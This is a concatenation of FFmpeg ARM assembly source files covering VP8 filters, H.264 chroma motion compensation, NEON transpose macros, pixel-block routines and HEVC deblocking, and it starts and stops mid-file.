1:
ldr r9, [r2, #3]
ldr r8, [r2, #2]
ldr r7, [r2], #4
uxtb16 r9, r9, ror #8 @ src[6] | src[4]
uxtb16 r10, r8, ror #8 @ src[5] | src[3]
uxtb16 r8, r8 @ src[4] | src[2]
uxtb16 r11, r7, ror #8 @ src[3] | src[1]
uxtb16 r7, r7 @ src[2] | src[0]
mov r12, #0x40
smlad r9, r9, r6, r12 @ filter[3][1]
smlad r7, r7, r5, r12 @ filter[0][0]
smlad r9, r10, r5, r9 @ filter[3][0]
smlad r10, r10, r6, r12 @ filter[2][1]
smlad r12, r11, r5, r12 @ filter[1][0]
smlad r7, r11, r6, r7 @ filter[0][1]
smlad r10, r8, r5, r10 @ filter[2][0]
smlad r12, r8, r6, r12 @ filter[1][1]
subs r4, r4, #4
sat4 r7, r12, r10, r9
str r7, [r0], #4
bne 1b
subs lr, lr, #1
ldr r4, [sp, #40]
add r2, r2, r3
add r0, r0, r1
bne 1b
pop {r1, r4-r11, pc}
endfunc
function vp8_put_epel_v4_armv6
push {r1, r4-r11, lr}
bl_put_epel_v4_armv6:
movrel lr, fourtap_filters_1324 - 4
add lr, lr, r12, lsl #2
ldm lr, {r5, r6}
str r3, [sp, #48]
1:
ldr lr, [r2, r3, lsl #1]
ldr r12, [r2, r3]
ldr_nreg r7, r2, r3
ldr r11, [r2], #4
uxtb16 r8, lr, ror #8 @ src[3 + s*3] | src[1 + s*3]
uxtb16 r9, r12, ror #8 @ src[3 + s*2] | src[1 + s*2]
uxtb16 r3, r7, ror #8 @ src[3 + s*0] | src[1 + s*0]
uxtb16 r1, r11, ror #8 @ src[3 + s*1] | src[1 + s*1]
uxtb16 lr, lr @ src[2 + s*3] | src[0 + s*3]
uxtb16 r12, r12 @ src[2 + s*2] | src[0 + s*2]
uxtb16 r7, r7 @ src[2 + s*0] | src[0 + s*0]
uxtb16 r11, r11 @ src[2 + s*1] | src[0 + s*1]
pkhbt r10, r1, r8, lsl #16 @ src[1 + s*3] | src[1 + s*1]
pkhtb r1, r8, r1, asr #16 @ src[3 + s*3] | src[3 + s*1]
pkhbt r8, r3, r9, lsl #16 @ src[1 + s*2] | src[1 + s*0]
pkhtb r3, r9, r3, asr #16 @ src[3 + s*2] | src[3 + s*0]
pkhbt r9, r11, lr, lsl #16 @ src[0 + s*3] | src[0 + s*1]
pkhtb r11, lr, r11, asr #16 @ src[2 + s*3] | src[2 + s*1]
pkhbt lr, r7, r12, lsl #16 @ src[0 + s*2] | src[0 + s*0]
pkhtb r7, r12, r7, asr #16 @ src[2 + s*2] | src[2 + s*0]
mov r12, #0x40
smlad r9, r9, r6, r12 @ filter[0][1]
smlad r10, r10, r6, r12 @ filter[1][1]
smlad r11, r11, r6, r12 @ filter[2][1]
smlad r1, r1, r6, r12 @ filter[3][1]
smlad r9, lr, r5, r9 @ filter[0][0]
smlad r10, r8, r5, r10 @ filter[1][0]
smlad r11, r7, r5, r11 @ filter[2][0]
smlad r1, r3, r5, r1 @ filter[3][0]
subs r4, r4, #4
ldr r3, [sp, #48]
sat4 r9, r10, r11, r1
str r9, [r0], #4
bne 1b
ldr r4, [sp, #40]
ldr r12, [sp, #44]
add r2, r2, r3
ldr r9, [sp, #0]
subs r12, r12, #1
sub r2, r2, r4
str r12, [sp, #44]
add r0, r0, r9
bne 1b
pop {r1, r4-r11, pc}
endfunc
function vp8_put_bilin_h_armv6
push {r1, r4-r11, lr}
bl_put_bilin_h_armv6:
rsb r5, r12, r12, lsl #16
ldr r12, [sp, #44]
sub r3, r3, r4
add r5, r5, #8
1:
ldrb r6, [r2], #1
ldrb r7, [r2], #1
ldrb r8, [r2], #1
ldrb r9, [r2], #1
ldrb lr, [r2]
pkhbt r6, r6, r7, lsl #16 @ src[1] | src[0]
pkhbt r7, r7, r8, lsl #16 @ src[2] | src[1]
pkhbt r8, r8, r9, lsl #16 @ src[3] | src[2]
pkhbt r9, r9, lr, lsl #16 @ src[4] | src[3]
mov r10, #4
smlad r6, r6, r5, r10
smlad r7, r7, r5, r10
smlad r8, r8, r5, r10
smlad r9, r9, r5, r10
subs r4, r4, #4
asr r6, #3
asr r7, #3
pkhbt r6, r6, r8, lsl #13
pkhbt r7, r7, r9, lsl #13
orr r6, r6, r7, lsl #8
str r6, [r0], #4
bne 1b
ldr r4, [sp, #40]
subs r12, r12, #1
add r2, r2, r3
add r0, r0, r1
bne 1b
pop {r1, r4-r11, pc}
endfunc
function vp8_put_bilin_v_armv6
push {r1, r4-r11, lr}
bl_put_bilin_v_armv6:
rsb r5, r12, r12, lsl #16
ldr r12, [sp, #44]
add r5, r5, #8
1:
ldrb r10, [r2, r3]
ldrb r6, [r2], #1
ldrb r11, [r2, r3]
ldrb r7, [r2], #1
ldrb lr, [r2, r3]
ldrb r8, [r2], #1
ldrb r9, [r2, r3]
pkhbt r6, r6, r10, lsl #16
ldrb r10, [r2], #1
pkhbt r7, r7, r11, lsl #16
pkhbt r8, r8, lr, lsl #16
pkhbt r9, r10, r9, lsl #16
mov r10, #4
smlad r6, r6, r5, r10
smlad r7, r7, r5, r10
smlad r8, r8, r5, r10
smlad r9, r9, r5, r10
subs r4, r4, #4
asr r6, #3
asr r7, #3
pkhbt r6, r6, r8, lsl #13
pkhbt r7, r7, r9, lsl #13
orr r6, r6, r7, lsl #8
str r6, [r0], #4
bne 1b
ldr r4, [sp, #40]
subs r12, r12, #1
add r2, r2, r3
add r0, r0, r1
sub r2, r2, r4
bne 1b
pop {r1, r4-r11, pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 14,259
|
ffmpeg-3.0.2/libavcodec/arm/h264cmc_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
/* chroma_mc8(uint8_t *dst, uint8_t *src, int stride, int h, int x, int y) */
.macro h264_chroma_mc8 type, codec=h264
function ff_\type\()_\codec\()_chroma_mc8_neon, export=1
push {r4-r7, lr}
ldrd r4, r5, [sp, #20]
.ifc \type,avg
mov lr, r0
.endif
pld [r1]
pld [r1, r2]
.ifc \codec,rv40
movrel r6, rv40bias
lsr r7, r5, #1
add r6, r6, r7, lsl #3
lsr r7, r4, #1
add r6, r6, r7, lsl #1
vld1.16 {d22[],d23[]}, [r6,:16]
.endif
.ifc \codec,vc1
vmov.u16 q11, #28
.endif
A muls r7, r4, r5
T mul r7, r4, r5
T cmp r7, #0
rsb r6, r7, r5, lsl #3
rsb r12, r7, r4, lsl #3
sub r4, r7, r4, lsl #3
sub r4, r4, r5, lsl #3
add r4, r4, #64
beq 2f
vdup.8 d0, r4
vdup.8 d1, r12
vld1.8 {d4, d5}, [r1], r2
vdup.8 d2, r6
vdup.8 d3, r7
vext.8 d5, d4, d5, #1
1: vld1.8 {d6, d7}, [r1], r2
vmull.u8 q8, d4, d0
vmlal.u8 q8, d5, d1
vext.8 d7, d6, d7, #1
vld1.8 {d4, d5}, [r1], r2
vmlal.u8 q8, d6, d2
pld [r1]
vext.8 d5, d4, d5, #1
vmlal.u8 q8, d7, d3
vmull.u8 q9, d6, d0
subs r3, r3, #2
vmlal.u8 q9, d7, d1
vmlal.u8 q9, d4, d2
vmlal.u8 q9, d5, d3
pld [r1, r2]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
vrshrn.u16 d17, q9, #6
.else
vadd.u16 q8, q8, q11
vadd.u16 q9, q9, q11
vshrn.u16 d16, q8, #6
vshrn.u16 d17, q9, #6
.endif
.ifc \type,avg
vld1.8 {d20}, [lr,:64], r2
vld1.8 {d21}, [lr,:64], r2
vrhadd.u8 q8, q8, q10
.endif
vst1.8 {d16}, [r0,:64], r2
vst1.8 {d17}, [r0,:64], r2
bgt 1b
pop {r4-r7, pc}
2: adds r12, r12, r6
vdup.8 d0, r4
beq 5f
tst r6, r6
vdup.8 d1, r12
beq 4f
vld1.8 {d4}, [r1], r2
3: vld1.8 {d6}, [r1], r2
vmull.u8 q8, d4, d0
vmlal.u8 q8, d6, d1
vld1.8 {d4}, [r1], r2
vmull.u8 q9, d6, d0
vmlal.u8 q9, d4, d1
pld [r1]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
vrshrn.u16 d17, q9, #6
.else
vadd.u16 q8, q8, q11
vadd.u16 q9, q9, q11
vshrn.u16 d16, q8, #6
vshrn.u16 d17, q9, #6
.endif
pld [r1, r2]
.ifc \type,avg
vld1.8 {d20}, [lr,:64], r2
vld1.8 {d21}, [lr,:64], r2
vrhadd.u8 q8, q8, q10
.endif
subs r3, r3, #2
vst1.8 {d16}, [r0,:64], r2
vst1.8 {d17}, [r0,:64], r2
bgt 3b
pop {r4-r7, pc}
4: vld1.8 {d4, d5}, [r1], r2
vld1.8 {d6, d7}, [r1], r2
vext.8 d5, d4, d5, #1
vext.8 d7, d6, d7, #1
pld [r1]
subs r3, r3, #2
vmull.u8 q8, d4, d0
vmlal.u8 q8, d5, d1
vmull.u8 q9, d6, d0
vmlal.u8 q9, d7, d1
pld [r1, r2]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
vrshrn.u16 d17, q9, #6
.else
vadd.u16 q8, q8, q11
vadd.u16 q9, q9, q11
vshrn.u16 d16, q8, #6
vshrn.u16 d17, q9, #6
.endif
.ifc \type,avg
vld1.8 {d20}, [lr,:64], r2
vld1.8 {d21}, [lr,:64], r2
vrhadd.u8 q8, q8, q10
.endif
vst1.8 {d16}, [r0,:64], r2
vst1.8 {d17}, [r0,:64], r2
bgt 4b
pop {r4-r7, pc}
5: vld1.8 {d4}, [r1], r2
vld1.8 {d5}, [r1], r2
pld [r1]
subs r3, r3, #2
vmull.u8 q8, d4, d0
vmull.u8 q9, d5, d0
pld [r1, r2]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
vrshrn.u16 d17, q9, #6
.else
vadd.u16 q8, q8, q11
vadd.u16 q9, q9, q11
vshrn.u16 d16, q8, #6
vshrn.u16 d17, q9, #6
.endif
.ifc \type,avg
vld1.8 {d20}, [lr,:64], r2
vld1.8 {d21}, [lr,:64], r2
vrhadd.u8 q8, q8, q10
.endif
vst1.8 {d16}, [r0,:64], r2
vst1.8 {d17}, [r0,:64], r2
bgt 5b
pop {r4-r7, pc}
endfunc
.endm
/* chroma_mc4(uint8_t *dst, uint8_t *src, int stride, int h, int x, int y) */
.macro h264_chroma_mc4 type, codec=h264
function ff_\type\()_\codec\()_chroma_mc4_neon, export=1
push {r4-r7, lr}
ldrd r4, r5, [sp, #20]
.ifc \type,avg
mov lr, r0
.endif
pld [r1]
pld [r1, r2]
.ifc \codec,rv40
movrel r6, rv40bias
lsr r7, r5, #1
add r6, r6, r7, lsl #3
lsr r7, r4, #1
add r6, r6, r7, lsl #1
vld1.16 {d22[],d23[]}, [r6,:16]
.endif
.ifc \codec,vc1
vmov.u16 q11, #28
.endif
A muls r7, r4, r5
T mul r7, r4, r5
T cmp r7, #0
rsb r6, r7, r5, lsl #3
rsb r12, r7, r4, lsl #3
sub r4, r7, r4, lsl #3
sub r4, r4, r5, lsl #3
add r4, r4, #64
beq 2f
vdup.8 d0, r4
vdup.8 d1, r12
vld1.8 {d4}, [r1], r2
vdup.8 d2, r6
vdup.8 d3, r7
vext.8 d5, d4, d5, #1
vtrn.32 d4, d5
vtrn.32 d0, d1
vtrn.32 d2, d3
1: vld1.8 {d6}, [r1], r2
vext.8 d7, d6, d7, #1
vtrn.32 d6, d7
vmull.u8 q8, d4, d0
vmlal.u8 q8, d6, d2
vld1.8 {d4}, [r1], r2
vext.8 d5, d4, d5, #1
vtrn.32 d4, d5
pld [r1]
vmull.u8 q9, d6, d0
vmlal.u8 q9, d4, d2
vadd.i16 d16, d16, d17
vadd.i16 d17, d18, d19
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
.else
vadd.u16 q8, q8, q11
vshrn.u16 d16, q8, #6
.endif
subs r3, r3, #2
pld [r1, r2]
.ifc \type,avg
vld1.32 {d20[0]}, [lr,:32], r2
vld1.32 {d20[1]}, [lr,:32], r2
vrhadd.u8 d16, d16, d20
.endif
vst1.32 {d16[0]}, [r0,:32], r2
vst1.32 {d16[1]}, [r0,:32], r2
bgt 1b
pop {r4-r7, pc}
2: adds r12, r12, r6
vdup.8 d0, r4
beq 5f
tst r6, r6
vdup.8 d1, r12
vtrn.32 d0, d1
beq 4f
vext.32 d1, d0, d1, #1
vld1.32 {d4[0]}, [r1], r2
3: vld1.32 {d4[1]}, [r1], r2
vmull.u8 q8, d4, d0
vld1.32 {d4[0]}, [r1], r2
vmull.u8 q9, d4, d1
vadd.i16 d16, d16, d17
vadd.i16 d17, d18, d19
pld [r1]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
.else
vadd.u16 q8, q8, q11
vshrn.u16 d16, q8, #6
.endif
.ifc \type,avg
vld1.32 {d20[0]}, [lr,:32], r2
vld1.32 {d20[1]}, [lr,:32], r2
vrhadd.u8 d16, d16, d20
.endif
subs r3, r3, #2
pld [r1, r2]
vst1.32 {d16[0]}, [r0,:32], r2
vst1.32 {d16[1]}, [r0,:32], r2
bgt 3b
pop {r4-r7, pc}
4: vld1.8 {d4}, [r1], r2
vld1.8 {d6}, [r1], r2
vext.8 d5, d4, d5, #1
vext.8 d7, d6, d7, #1
vtrn.32 d4, d5
vtrn.32 d6, d7
vmull.u8 q8, d4, d0
vmull.u8 q9, d6, d0
subs r3, r3, #2
vadd.i16 d16, d16, d17
vadd.i16 d17, d18, d19
pld [r1]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
.else
vadd.u16 q8, q8, q11
vshrn.u16 d16, q8, #6
.endif
.ifc \type,avg
vld1.32 {d20[0]}, [lr,:32], r2
vld1.32 {d20[1]}, [lr,:32], r2
vrhadd.u8 d16, d16, d20
.endif
pld [r1]
vst1.32 {d16[0]}, [r0,:32], r2
vst1.32 {d16[1]}, [r0,:32], r2
bgt 4b
pop {r4-r7, pc}
5: vld1.32 {d4[0]}, [r1], r2
vld1.32 {d4[1]}, [r1], r2
vmull.u8 q8, d4, d0
subs r3, r3, #2
pld [r1]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
.else
vadd.u16 q8, q8, q11
vshrn.u16 d16, q8, #6
.endif
.ifc \type,avg
vld1.32 {d20[0]}, [lr,:32], r2
vld1.32 {d20[1]}, [lr,:32], r2
vrhadd.u8 d16, d16, d20
.endif
pld [r1]
vst1.32 {d16[0]}, [r0,:32], r2
vst1.32 {d16[1]}, [r0,:32], r2
bgt 5b
pop {r4-r7, pc}
endfunc
.endm
.macro h264_chroma_mc2 type
function ff_\type\()_h264_chroma_mc2_neon, export=1
push {r4-r6, lr}
ldr r4, [sp, #16]
ldr lr, [sp, #20]
pld [r1]
pld [r1, r2]
orrs r5, r4, lr
beq 2f
mul r5, r4, lr
rsb r6, r5, lr, lsl #3
rsb r12, r5, r4, lsl #3
sub r4, r5, r4, lsl #3
sub r4, r4, lr, lsl #3
add r4, r4, #64
vdup.8 d0, r4
vdup.8 d2, r12
vdup.8 d1, r6
vdup.8 d3, r5
vtrn.16 q0, q1
1:
vld1.32 {d4[0]}, [r1], r2
vld1.32 {d4[1]}, [r1], r2
vrev64.32 d5, d4
vld1.32 {d5[1]}, [r1]
vext.8 q3, q2, q2, #1
vtrn.16 q2, q3
vmull.u8 q8, d4, d0
vmlal.u8 q8, d5, d1
.ifc \type,avg
vld1.16 {d18[0]}, [r0,:16], r2
vld1.16 {d18[1]}, [r0,:16]
sub r0, r0, r2
.endif
vtrn.32 d16, d17
vadd.i16 d16, d16, d17
vrshrn.u16 d16, q8, #6
.ifc \type,avg
vrhadd.u8 d16, d16, d18
.endif
vst1.16 {d16[0]}, [r0,:16], r2
vst1.16 {d16[1]}, [r0,:16], r2
subs r3, r3, #2
bgt 1b
pop {r4-r6, pc}
2:
.ifc \type,put
ldrh_post r5, r1, r2
strh_post r5, r0, r2
ldrh_post r6, r1, r2
strh_post r6, r0, r2
.else
vld1.16 {d16[0]}, [r1], r2
vld1.16 {d16[1]}, [r1], r2
vld1.16 {d18[0]}, [r0,:16], r2
vld1.16 {d18[1]}, [r0,:16]
sub r0, r0, r2
vrhadd.u8 d16, d16, d18
vst1.16 {d16[0]}, [r0,:16], r2
vst1.16 {d16[1]}, [r0,:16], r2
.endif
subs r3, r3, #2
bgt 2b
pop {r4-r6, pc}
endfunc
.endm
h264_chroma_mc8 put
h264_chroma_mc8 avg
h264_chroma_mc4 put
h264_chroma_mc4 avg
h264_chroma_mc2 put
h264_chroma_mc2 avg
#if CONFIG_RV40_DECODER
const rv40bias
.short 0, 16, 32, 16
.short 32, 28, 32, 28
.short 0, 32, 16, 32
.short 32, 28, 32, 28
endconst
h264_chroma_mc8 put, rv40
h264_chroma_mc8 avg, rv40
h264_chroma_mc4 put, rv40
h264_chroma_mc4 avg, rv40
#endif
#if CONFIG_VC1_DECODER
h264_chroma_mc8 put, vc1
h264_chroma_mc8 avg, vc1
h264_chroma_mc4 put, vc1
h264_chroma_mc4 avg, vc1
#endif
|
Akagi201/ffmpeg-xcode
| 1,975
|
ffmpeg-3.0.2/libavcodec/arm/neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
.macro transpose_8x8 r0, r1, r2, r3, r4, r5, r6, r7
vtrn.32 \r0, \r4
vtrn.32 \r1, \r5
vtrn.32 \r2, \r6
vtrn.32 \r3, \r7
vtrn.16 \r0, \r2
vtrn.16 \r1, \r3
vtrn.16 \r4, \r6
vtrn.16 \r5, \r7
vtrn.8 \r0, \r1
vtrn.8 \r2, \r3
vtrn.8 \r4, \r5
vtrn.8 \r6, \r7
.endm
.macro transpose_4x4 r0, r1, r2, r3
vtrn.16 \r0, \r2
vtrn.16 \r1, \r3
vtrn.8 \r0, \r1
vtrn.8 \r2, \r3
.endm
.macro swap4 r0, r1, r2, r3, r4, r5, r6, r7
vswp \r0, \r4
vswp \r1, \r5
vswp \r2, \r6
vswp \r3, \r7
.endm
.macro transpose16_4x4 r0, r1, r2, r3, r4, r5, r6, r7
vtrn.32 \r0, \r2
vtrn.32 \r1, \r3
vtrn.32 \r4, \r6
vtrn.32 \r5, \r7
vtrn.16 \r0, \r1
vtrn.16 \r2, \r3
vtrn.16 \r4, \r5
vtrn.16 \r6, \r7
.endm
|
Akagi201/ffmpeg-xcode
| 2,665
|
ffmpeg-3.0.2/libavcodec/arm/pixblockdsp_armv6.S
|
/*
* Copyright (c) 2009 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
function ff_get_pixels_armv6, export=1
pld [r1, r2]
push {r4-r8, lr}
mov lr, #8
1:
ldrd_post r4, r5, r1, r2
subs lr, lr, #1
uxtb16 r6, r4
uxtb16 r4, r4, ror #8
uxtb16 r12, r5
uxtb16 r8, r5, ror #8
pld [r1, r2]
pkhbt r5, r6, r4, lsl #16
pkhtb r6, r4, r6, asr #16
pkhbt r7, r12, r8, lsl #16
pkhtb r12, r8, r12, asr #16
stm r0!, {r5,r6,r7,r12}
bgt 1b
pop {r4-r8, pc}
endfunc
function ff_diff_pixels_armv6, export=1
pld [r1, r3]
pld [r2, r3]
push {r4-r9, lr}
mov lr, #8
1:
ldrd_post r4, r5, r1, r3
ldrd_post r6, r7, r2, r3
uxtb16 r8, r4
uxtb16 r4, r4, ror #8
uxtb16 r9, r6
uxtb16 r6, r6, ror #8
pld [r1, r3]
ssub16 r9, r8, r9
ssub16 r6, r4, r6
uxtb16 r8, r5
uxtb16 r5, r5, ror #8
pld [r2, r3]
pkhbt r4, r9, r6, lsl #16
pkhtb r6, r6, r9, asr #16
uxtb16 r9, r7
uxtb16 r7, r7, ror #8
ssub16 r9, r8, r9
ssub16 r5, r5, r7
subs lr, lr, #1
pkhbt r8, r9, r5, lsl #16
pkhtb r9, r5, r9, asr #16
stm r0!, {r4,r6,r8,r9}
bgt 1b
pop {r4-r9, pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 10,346
|
ffmpeg-3.0.2/libavcodec/arm/hevcdsp_deblock_neon.S
|
/*
* Copyright (c) 2014 Seppo Tomperi <seppo.tomperi@vtt.fi>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#include "neon.S"
.macro hevc_loop_filter_chroma_start
ldr r12, [r2]
ldr r3, [r2, #4]
add r2, r3, r12
cmp r2, #0
it eq
bxeq lr
.endm
.macro hevc_loop_filter_chroma_body
vsubl.u8 q3, d4, d2
vsubl.u8 q11, d18, d19
vshl.i16 q3, #2
vadd.i16 q11, q3
vdup.16 d0, r12
vdup.16 d1, r3
vrshr.s16 q11, q11, #3
vneg.s16 q12, q0
vmovl.u8 q2, d4
vmin.s16 q11, q11, q0
vmax.s16 q11, q11, q12
vaddw.u8 q1, q11, d2
vsub.i16 q2, q11
vqmovun.s16 d2, q1
vqmovun.s16 d4, q2
.endm
.macro hevc_loop_filter_luma_start
ldr r12, [r3]
ldr r3, [r3, #4]
lsl r3, #16
orr r3, r12
cmp r3, #0
it eq
bxeq lr
lsr r3, #16
.endm
.macro hevc_loop_filter_luma_body
vmovl.u8 q8, d16
vmovl.u8 q9, d18
vmovl.u8 q10, d20
vmovl.u8 q11, d22
vmovl.u8 q12, d24
vmovl.u8 q13, d26
vmovl.u8 q14, d28
vmovl.u8 q15, d30
vadd.i16 q7, q9, q11
vadd.i16 q6, q14, q12
vsub.i16 q7, q10
vsub.i16 q6, q13
vabd.s16 q7, q7, q10
vabd.s16 q6, q6, q13
vdup.16 q0, r2
vmov q4, q7
vmov q5, q6
vdup.16 d4, r12
vtrn.16 q7, q4
vtrn.16 q6, q5
vshl.u64 q7, #32
vshr.u64 q4, #32
vshl.u64 q6, #32
vshr.u64 q5, #32
vshr.u64 q7, #32
vshr.u64 q6, #32
vshl.u64 q5, #32
vshl.u64 q4, #32
vorr q6, q5
vorr q7, q4
vdup.16 d5, r3
vadd.i16 q5, q7, q6
vmov q4, q5
vmov q3, q5
vtrn.32 q3, q4
vadd.i16 q4, q3
vshl.s16 q5, q5, #1
vcgt.s16 q3, q0, q4
vmovn.i16 d6, q3
vshr.s16 q1, q0, #2
vmovn.i16 d6, q3
vcgt.s16 q5, q1, q5
vmov r7, s12
cmp r7, #0
beq bypasswrite
vpadd.i32 d0, d14, d12
vpadd.i32 d1, d15, d13
vmov q4, q2
vshl.s16 q2, #2
vshr.s16 q1, q1, #1
vrhadd.s16 q2, q4
vabd.s16 q7, q8, q11
vaba.s16 q7, q15, q12
vmovn.i32 d0, q0
vmov r5, r6, s0, s1
vcgt.s16 q6, q1, q7
vand q5, q5, q6
vabd.s16 q7, q11, q12
vcgt.s16 q6, q2, q7
vand q5, q5, q6
vmov q2, q5
vtrn.s16 q5, q2
vshr.u64 q2, #32
vshl.u64 q5, #32
vshl.u64 q2, #32
vshr.u64 q5, #32
vorr q5, q2
vmov q2, q5
vshl.i16 q7, q4, #1
vtrn.32 q2, q5
vand q5, q2
vneg.s16 q6, q7
vmovn.i16 d4, q5
vmovn.i16 d4, q2
vmov r8, s8
and r9, r8, r7
cmp r9, #0
beq weakfilter_\@
vadd.i16 q2, q11, q12
vadd.i16 q4, q9, q8
vadd.i16 q1, q2, q10
vdup.16 d10, r9
vadd.i16 q0, q1, q9
vshl.i16 q4, #1
lsr r9, #16
vadd.i16 q1, q0
vrshr.s16 q3, q0, #2
vadd.i16 q1, q13
vadd.i16 q4, q0
vsub.i16 q3, q10
vrshr.s16 q1, #3
vrshr.s16 q4, #3
vmax.s16 q3, q6
vsub.i16 q1, q11
vsub.i16 q4, q9
vmin.s16 q3, q7
vmax.s16 q4, q6
vmax.s16 q1, q6
vadd.i16 q3, q10
vmin.s16 q4, q7
vmin.s16 q1, q7
vdup.16 d11, r9
vadd.i16 q4, q9
vadd.i16 q1, q11
vbit q9, q4, q5
vadd.i16 q4, q2, q13
vbit q11, q1, q5
vadd.i16 q0, q4, q14
vadd.i16 q2, q15, q14
vadd.i16 q4, q0
vshl.i16 q2, #1
vadd.i16 q4, q10
vbit q10, q3, q5
vrshr.s16 q4, #3
vadd.i16 q2, q0
vrshr.s16 q3, q0, #2
vsub.i16 q4, q12
vrshr.s16 q2, #3
vsub.i16 q3, q13
vmax.s16 q4, q6
vsub.i16 q2, q14
vmax.s16 q3, q6
vmin.s16 q4, q7
vmax.s16 q2, q6
vmin.s16 q3, q7
vadd.i16 q4, q12
vmin.s16 q2, q7
vadd.i16 q3, q13
vbit q12, q4, q5
vadd.i16 q2, q14
vbit q13, q3, q5
vbit q14, q2, q5
weakfilter_\@:
mvn r8, r8
and r9, r8, r7
cmp r9, #0
beq ready_\@
vdup.16 q4, r2
vdup.16 d10, r9
lsr r9, #16
vmov q1, q4
vdup.16 d11, r9
vshr.s16 q1, #1
vsub.i16 q2, q12, q11
vadd.i16 q4, q1
vshl.s16 q0, q2, #3
vshr.s16 q4, #3
vadd.i16 q2, q0
vsub.i16 q0, q13, q10
vsub.i16 q2, q0
vshl.i16 q0, q0, #1
vsub.i16 q2, q0
vshl.s16 q1, q7, 2
vrshr.s16 q2, q2, #4
vadd.i16 q1, q7
vabs.s16 q3, q2
vshr.s16 q6, q6, #1
vcgt.s16 q1, q1, q3
vand q5, q1
vshr.s16 q7, q7, #1
vmax.s16 q2, q2, q6
vmin.s16 q2, q2, q7
vshr.s16 q7, q7, #1
vrhadd.s16 q3, q9, q11
vneg.s16 q6, q7
vsub.s16 q3, q10
vdup.16 d2, r5
vhadd.s16 q3, q2
vdup.16 d3, r6
vmax.s16 q3, q3, q6
vcgt.s16 q1, q4, q1
vmin.s16 q3, q3, q7
vand q1, q5
vadd.i16 q3, q10
lsr r5, #16
lsr r6, #16
vbit q10, q3, q1
vrhadd.s16 q3, q14, q12
vdup.16 d2, r5
vsub.s16 q3, q13
vdup.16 d3, r6
vhsub.s16 q3, q2
vcgt.s16 q1, q4, q1
vmax.s16 q3, q3, q6
vand q1, q5
vmin.s16 q3, q3, q7
vadd.i16 q3, q13
vbit q13, q3, q1
vadd.i16 q0, q11, q2
vsub.i16 q4, q12, q2
vbit q11, q0, q5
vbit q12, q4, q5
ready_\@:
vqmovun.s16 d16, q8
vqmovun.s16 d18, q9
vqmovun.s16 d20, q10
vqmovun.s16 d22, q11
vqmovun.s16 d24, q12
vqmovun.s16 d26, q13
vqmovun.s16 d28, q14
vqmovun.s16 d30, q15
.endm
function ff_hevc_v_loop_filter_luma_neon, export=1
hevc_loop_filter_luma_start
push {r5-r11}
vpush {d8-d15}
sub r0, #4
vld1.8 {d16}, [r0], r1
vld1.8 {d18}, [r0], r1
vld1.8 {d20}, [r0], r1
vld1.8 {d22}, [r0], r1
vld1.8 {d24}, [r0], r1
vld1.8 {d26}, [r0], r1
vld1.8 {d28}, [r0], r1
vld1.8 {d30}, [r0], r1
sub r0, r0, r1, lsl #3
transpose_8x8 d16, d18, d20, d22, d24, d26, d28, d30
hevc_loop_filter_luma_body
transpose_8x8 d16, d18, d20, d22, d24, d26, d28, d30
vst1.8 {d16}, [r0], r1
vst1.8 {d18}, [r0], r1
vst1.8 {d20}, [r0], r1
vst1.8 {d22}, [r0], r1
vst1.8 {d24}, [r0], r1
vst1.8 {d26}, [r0], r1
vst1.8 {d28}, [r0], r1
vst1.8 {d30}, [r0]
vpop {d8-d15}
pop {r5-r11}
bx lr
endfunc
function ff_hevc_h_loop_filter_luma_neon, export=1
hevc_loop_filter_luma_start
push {r5-r11}
vpush {d8-d15}
sub r0, r0, r1, lsl #2
